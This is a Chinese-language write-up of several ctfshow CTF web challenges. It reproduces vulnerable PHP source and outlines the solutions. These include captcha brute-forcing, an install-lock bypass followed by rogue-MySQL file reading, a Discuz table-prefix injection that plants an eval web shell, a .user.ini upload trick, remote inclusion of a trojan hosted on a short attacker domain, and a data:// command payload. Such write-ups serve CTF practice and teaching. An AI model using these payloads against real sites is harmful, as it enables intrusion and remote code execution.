baby_captcha
阴间题.
这里猜测后端是把验证码放到了session里.只要session不变验证码就一直是同一个. (猜错了当我没猜
所以直接拿字典爆破即可

ctfshowcms
主要下面两个文件:
index.php
1 2 3 4 5 6 7 8 9
| <?php define("ROOT_PATH",__DIR__); error_reporting(0);
$want = addslashes($_GET['feng']); $want = $want==""?"index":$want;
include('files/'.$want.".php");
|
install/index.php:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69
| <?php header('Content-Type:text/html;charset=utf-8'); if(file_exists("installLock.txt")){ echo "你已经安装了ctfshowcms,请勿重复安装。"; exit; } echo "欢迎安装ctfshowcms~"."<br>";
$user=$_POST['user']; $password=md5($_POST['password']); $dbhost=$_POST['dbhost']; $dbuser=$_POST['dbuser']; $dbpwd=$_POST['dbpwd']; $dbname=$_POST['dbname']; if($user==""){ echo "CMS管理员用户名不能为空!"; exit(); } if($password==""){ echo "CMS管理员密码不能为空!"; exit(); } if($dbhost==""){ echo "数据库地址不能为空!"; exit(); } if($dbuser==""){ echo "数据库用户名不能为空!"; exit(); } if($dbpwd==""){ echo "数据库密码不能为空!"; exit(); } if($dbname==""){ echo "数据库名不能为空!"; exit(); }
$db = mysql_connect ( $dbhost, $dbuser, $dbpwd ) or die("数据库连接失败");
$a = mysql_select_db ( $dbname, $db );
$b = mysql_query ( 'SET NAMES ' . 'utf-8', $db );
if(file_exists("ctfshow.sql")){ echo "正在写入数据库!"; }else{ die("sql文件不存在"); }
$content = "<?php \$DB_HOST='".$dbhost."'; \$DB_USER='".$dbuser."'; \$DB_PWD='".$dbpwd."'; \$DB_NAME='".$dbname."'; ?> ";
file_put_contents(ROOT_PATH."/data/settings.php",$content); echo "数据库设置写入成功!~"."<br>";
$of = fopen(ROOT_PATH.'/install/installLock.txt','w'); if($of){ fwrite($of,"ctfshowcms"); } echo "安装成功!";
|
在index.php包含install/index.php发现可以绕过file_exists("installLock.txt")
然后利用Mysql连接任意读文件,可以参考 https://blog.csdn.net/shuteer_xu/article/details/104046895/


应该不难
Discuz!漏洞直接打, 零组文库yyds

安装时的表前缀x');@eval($_POST[L0nm4r]);('

然后直接连shell

baby_php
代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60
| <?php class fileUtil{ private $name; private $content;
public function __construct($name,$content=''){ $this->name = $name; $this->content = $content; ini_set('open_basedir', '/var/www/html'); }
public function file_upload(){ if($this->waf($this->name) && $this->waf($this->content)){ return file_put_contents($this->name, $this->content); }else{ return 0; } }
private function waf($input){ return !preg_match('/php/i', $input); }
public function file_download(){ if(file_exists($this->name)){ header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.$this->name.'"'); header('Content-Transfer-Encoding: binary'); echo file_get_contents($this->name); }else{ return False; } } public function __destruct(){ } } $action = $_GET['a']?$_GET['a']:highlight_file(__FILE__); if($action==='upload'){ die('Permission denied'); } switch ($action) { case 'upload': $name = $_POST['name']; $content = $_POST['content']; $ft = new fileUtil($name,$content); if($ft->file_upload()){ echo $name.' upload success!'; } break; case 'download': $name = $_POST['name']; $ft = new fileUtil($name,$content); if($ft->file_download()===False){ echo $name.' download failed'; } break; default: echo 'baby come on'; break; }
|
传?a=0
或者不传 $action
都会被赋值为true,true和非空字符串松散比较恒等

所以$action=='upload'
, 下面就是上传文件的思路了.
上传一个test.txt

再上传.user.ini

然后直接连shell即可

完美的缺点
这题解法比较多.
1 2 3 4 5 6 7 8 9 10 11 12
| <?php highlight_file(__FILE__); error_reporting(0); ini_set('open_basedir', '/var/www/html/');
$file_name = substr($_GET['file_name'], 0,16); $file_content=substr($_GET['file_content'], 0,32);
file_put_contents('/c/t/f/s/h/o/w/'.$file_name, $file_content); if(file_get_contents('php://input')==='ctfshow'){ include($file_name); }
|
远程包含
在服务器上留一个木马然后包含即可, 主要是绕过长度限制.
- 买一个短域名: http://xxx.xxx/1 刚好16个字符

- 转进制 (师傅们运气好的话10进制ip是可以到16个字符以内的. by yu22x
data协议
feng师傅的解法,涨姿势.
1
| ?file_name=data:,<?=`nl%20*`;
|
